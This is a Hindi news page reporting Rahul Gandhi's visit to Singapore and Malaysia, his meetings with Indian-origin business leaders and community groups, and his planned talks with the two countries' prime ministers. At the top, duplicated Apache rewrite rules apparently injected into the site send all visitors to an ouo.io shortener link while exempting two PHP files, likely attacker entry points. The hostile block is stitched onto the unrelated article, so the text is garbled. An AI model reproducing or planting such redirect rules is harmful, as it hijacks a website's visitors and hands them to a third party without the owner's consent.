
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 394
Previous Nextनई दिल्ली। कांग्रेस अध्यक्ष राहुल गांधी पांच दिवसीय यात्रा पर सिंगापुर और मलेशिया गए हैं। राहुल गांधी ने सिंगापुर में भारतीय मूल के सीईओ से मुलाकात की और नौकरी, निवेश, आर्थिक मुद्दों सहित कई मामलों पर चर्चा की। राहुल गांधी ने कहा हम भारत के ग्रामीण लोगों के सबसे बड़े प्रवासन को देख रहे हैं। हमारे पास चुनौतियां हैं। हम एक शांतिपूर्ण परिवर्तन करना चाहते हैं, एक परिवर्तन जो सभी को एक साथ रखता हो। उन्होंने आगे कहा कि हम समाज को ऐसी प्रणाली के रूप में देखते हैं, जिसे संतुलन में रखा जाना चाहिए। दूसरी ओर भाजपा शांति के बारे में कम चिंतित है। हम समाज के ध्रुवीकरण और उनसे पैदा होने वाले जोखिम को बहुत गंभीर खतरे की तरह देखते हैं।
कांग्रेस अध्यक्ष राहुल गांधी ने बैलेस्टियर रोड स्थित सिंगापुर इंडियन एसोसिएशन का दौरा किया। एसोसिएशन क्लब हाउस की आधारशिला 1923 में पूर्व प्रधानमंत्री जवाहरलाल नेहरू ने रखी थी। कांग्रेस अध्यक्ष राहुल गांधी ने कमला क्लब के सदस्यों से सिंगापुर इंडियन असंस में मुलाकात की। पूर्व पीएम नेहरु के सुझाव पर लोटस क्लब एंड लेडीज यूनियन के एकीकरण के रूप में बनाया गया था। कमला क्लब महिलाओं के अधिकारों और सशक्तिकरण के मुद्दों पर काम करता है। इसके बाद राहुल गांधी ने नेताजी सुभाष चंद्र बोस को श्रद्धांजलि दी और सिंगापुर इंडियन एसोसिएशन के साथ बातचीत की। इस यात्रा के दौरान राहुल गांधी भारतीय समुदाय से भी मिलेंग और संवाद करेंगे। कांग्रेस सूत्रों के अनुसार अपनी यात्रा के दौरान राहुल गांधी दोनों देशों के प्रधानमंत्री से मिलेंगे। पार्टी सूत्रों ने बताया कि कांग्रेस अध्यक्ष नौ मार्च को सिंगापुर के प्रधानमंत्री ली सिएन लूंग और 10 मार्च को मलेशिया के प्रधानमंत्री नजीब रजाक से मुलाकात कर सकते हैं। राहुल गांधी सिंगापुर के विदेश मंत्री विवियन बालकृष्णन से भी मुलाकात करेंगे। कल नौ मार्च को उनका प्रधानमंत्री लूंग से मिलने का कार्यक्रम है। राहुल गांधी वहां ओवरसीज कांग्रेस के सदस्यों को संबोधित करेंगे तथा भारतीय समुदाय के प्रतिनिधियों से मिलेंगे। राहुल गांधी सिंगापुर के बाद 10 मार्च को मलेशिया के लिए रवाना होंगे। मलेशिया में वह भारतीय उद्यमियों तथा अन्य कारोबारी प्रतिनिधियों से मिलेंगे।